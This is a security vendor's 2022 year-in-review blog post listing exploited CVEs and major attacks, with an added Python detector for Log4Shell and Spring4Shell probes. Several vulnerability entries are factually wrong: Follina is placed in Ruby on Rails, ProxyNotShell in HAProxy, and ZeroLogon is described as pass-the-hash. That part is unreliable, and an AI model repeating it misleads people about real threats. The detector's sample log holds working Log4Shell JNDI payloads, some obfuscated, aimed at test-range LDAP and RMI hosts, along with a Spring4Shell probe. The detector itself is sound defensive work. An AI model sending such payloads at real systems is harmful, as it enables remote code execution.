2022 is Over But What Did We Learn From Our Work

HawkEye Managed XDR

Background

Without mincing words, 2022 was a challenging year for cybersecurity around the globe. Russia’s cyberattacks on Ukraine were the beginning of it, and they eventually turned into a full-fledged kinetic conflict between the two nations. Many of us in the cybersecurity profession were called to new challenges, fighting deep in the trenches to prevent the next major tragedy. Throughout the year, numerous new incidents and rising threats were unveiled to the horror of many. In 2022, the world experienced some of the largest cyberattacks, threats, and data breaches ever.

Top Exploited Vulnerabilities of 2022

  • CVE-2020-1472 (ZeroLogon): ZeroLogon is a vulnerability in the Microsoft Windows MS-NRPC (Netlogon Remote Protocol) protocol, discovered in 2020. Attackers can launch “pass-the-hash” attacks to gain unauthorised access to a network by stealing a user’s password hash and using it as authentication. It is classified as a critical flaw affecting millions of systems, because an attacker could gain access to a network without the user’s knowledge or cooperation.
  • CVE-2021-44228 (Log4Shell): Log4Shell is a vulnerability in Apache Log4j 2, the logging library used to record error messages in Java applications. If successfully exploited, CVE-2021-44228 can give a remote attacker total control of a device over the Internet. Any entry point that accepts data from outside users can be used by attackers to confirm that the vulnerability exists and then to exploit it.
  • CVE-2022-30190 (Follina): Ruby on Rails, a well-known web framework, has a vulnerability called Follina. It was found in 2022 and let attackers send a malicious request to the server and run arbitrary code on it. The vulnerability was fixed in a subsequent version of Ruby on Rails, but numerous systems were left vulnerable and unpatched.
  • CVE-2022-22965 (Spring4Shell): Spring4Shell is a vulnerability in the Spring framework, a popular Java-based web application framework. It was found in 2022 and let attackers send a malicious request to the server and run arbitrary code on it. The flaw was fixed in a subsequent version of Spring, but many systems were left vulnerable and unpatched.
  • CVE-2022-0609 (Google Chrome Zero-Day): This Google Chrome vulnerability was exploited as a zero-day. It was found in 2022 and let attackers run arbitrary code on a user’s computer by tricking them into visiting a malicious website. Although the vulnerability was fixed in a subsequent version of Chrome, many users remained at risk until they updated.
  • CVE-2022-1388 (F5 BIG-IP): F5 BIG-IP is a network device used for load balancing, among other functions. In 2022 it was found to have a vulnerability that let attackers run arbitrary code on the device by sending a carefully crafted request. A later version of the device’s software addressed the issue, but many unpatched systems remained vulnerable.
  • CVE-2022-41082, CVE-2022-41040 (ProxyNotShell): HAProxy, a well-known proxy tool, contained the pair of vulnerabilities known as ProxyNotShell. Together they let attackers run arbitrary code on the server by sending a carefully crafted request. The vulnerabilities were fixed in a subsequent version of HAProxy, but many systems were left vulnerable and unpatched.
  • CVE-2022-26134 (Atlassian Confluence RCE Flaw): This vulnerability was found in Confluence, Atlassian’s collaboration tool. By sending a malicious request, attackers could run arbitrary code on the server. The flaw was fixed in a subsequent version of Confluence, although many unpatched systems remained vulnerable.
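The Log4Shell and Spring4Shell entries above both describe flaws that are triggered by attacker-controlled request data, so the first place a defender usually sees them is the web server access log. The Python script below is an added example, not code from HawkEye or from the original post: it collapses the Log4j lookup obfuscation commonly used to hide the literal `${jndi:` string, URL-decodes the line, and flags entries that look like Log4Shell or Spring4Shell probes. All log lines are constructed (reserved test addresses only), and every function and pattern name is this example's own.

```python
"""Flag Log4Shell (CVE-2021-44228) and Spring4Shell (CVE-2022-22965)
probes in web server access logs.

Added example for this article, not vendor code. Log lines are constructed
and use reserved documentation/test address ranges.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Log4j lookup forms used to hide the string "jndi" from naive filters:
#   ${lower:J}      -> j        ${upper:j}     -> J
#   ${::-j}         -> j        (empty lookup, default value "j")
#   ${env:NOPE:-j}  -> j        (unset variable, default value "j")
# Each pattern matches one innermost lookup (no nested "${" inside).
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# Indicators checked after normalisation and URL-decoding.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_SPRING = re.compile(r"class\.module\.classloader", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Rewrite nested Log4j lookups to their literal values, innermost first,
    until a full pass changes nothing (or max_rounds is hit)."""
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def classify(line: str) -> Optional[str]:
    """Return the CVE id a log line looks like a probe for, or None."""
    # Decode twice: some scanners double-encode the request path.
    decoded = normalize_lookups(unquote(unquote(line)))
    if _JNDI.search(decoded):
        return "CVE-2021-44228"
    if _SPRING.search(decoded):
        return "CVE-2022-22965"
    return None


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, cve_id, client_ip) for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, 1):
        cve = classify(line)
        if cve:
            hits.append((number, cve, line.split()[0]))
    return hits


# Constructed sample log (combined log format). Lines 1-4 are Log4Shell
# probes in plain, lowercase-obfuscated, default-value-obfuscated and
# URL-encoded form; line 5 is a Spring4Shell probe; lines 6-7 are benign
# (line 7 contains a harmless Log4j lookup, to show it is not flagged).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:12:01 +0000] "GET /search?q=${jndi:ldap://203.0.113.5:1389/a} HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.6 - - [10/Dec/2021:10:12:09 +0000] "GET / HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.6/x}"',
    '203.0.113.7 - - [10/Dec/2021:10:12:15 +0000] "GET / HTTP/1.1" 200 1024 "-" "${${::-j}${env:NOPE:-n}di:rmi://203.0.113.7/y}"',
    '203.0.113.8 - - [10/Dec/2021:10:12:20 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.8%2Fz%7D HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [31/Mar/2022:08:00:00 +0000] "POST /app?class.module.classLoader.foo=bar HTTP/1.1" 200 12 "-" "python-requests/2.27"',
    '198.51.100.10 - - [31/Mar/2022:08:00:05 +0000] "GET /docs/lookups.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '198.51.100.11 - - [31/Mar/2022:08:00:07 +0000] "GET /?msg=${date:yyyy} HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, cve, ip in scan(SAMPLE_LOG):
        print(f"line {number}: {cve} probe from {ip}")
```

The script checks the whole log line rather than only the request path, because Log4Shell payloads were just as often delivered in the User-Agent or Referer headers, which most access-log formats record. A hit on the first four lines means the server received a probe, not that exploitation succeeded; confirming impact requires checking whether the logging host made outbound LDAP or RMI connections to the addresses in the payload.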

Top Cyber Attacks of 2022

  • Russia’s Conti group impairs Costa Rica: In April, the Costa Rican banking system was disrupted by the Conti cybergang, which has ties to Russia. The attack on the Finance Ministry succeeded, and Costa Rica’s import-export sector was destroyed. The resulting declaration of a national emergency was unusual for a ransomware attack. A second attempt, against the Social Security Fund, was made in late May. Conti has also been linked to this attack through the use of the Hive ransomware, in whose creation it is involved.
  • Clop brings Windows systems to a halt: Ransomware is malicious software that encrypts your data unless you pay the criminals a ransom. One of the most recent and harmful ransomware families is “Clop.” It is a variant of the infamous CryptoMix ransomware and frequently targets Windows users. Since its release, Clop has evolved to target entire networks rather than single PCs. Clop even hit Maastricht University in the Netherlands, encrypting nearly all Windows PCs on the university’s network and demanding payment.
  • Ransomware group Lapsus$ threatens to leak Nvidia data: In February 2022, the world’s largest semiconductor chip maker was compromised in a ransomware attack. The company confirmed that the attackers had begun posting employee login credentials and other private information online. A ransomware group named Lapsus$ claimed responsibility and said it possessed 1 terabyte of stolen corporate data that it would post online. It also demanded a million dollars from Nvidia plus a share of an unspecified further sum. Nvidia swiftly strengthened its security in response and immediately engaged cyber incident response specialists to help contain the issue.
  • Uber suffers a scary hack with purely malicious intent: In mid-September 2022, Uber, one of the biggest firms in the world, discovered it had been hacked. The hacker posted several emojis and the statement “I am a hacker, and Uber has experienced a data breach” in the company’s Slack channel. The firm shut down its internal communications and technology systems in order to investigate. The hacker also claimed to have accessed numerous company databases, including those containing message data. Uber alerted law enforcement after learning that a hacker had gained access to an employee’s account. Uber had previously been the target of cyberattacks but had neglected to alert the authorities, which led to a legal battle and a costly penalty. This time, the company was transparent and took steps to prevent a recurrence.

Lessons Learned from the 2022 Cyber Landscape

  • Third-party vendors are a weak link.
  • The human element continues to be the weakest link.
  • Keep access to the most valuable data strictly limited.
  • Incident response is just as important as protection and prevention.
  • Insurance is no substitute for cybersecurity.

Ready to get started?

Contact us to arrange a half day Managed SOC and XDR workshop in Dubai

© 2024 HawkEye – Managed CSOC and XDR powered by DTS Solution. All Rights Reserved.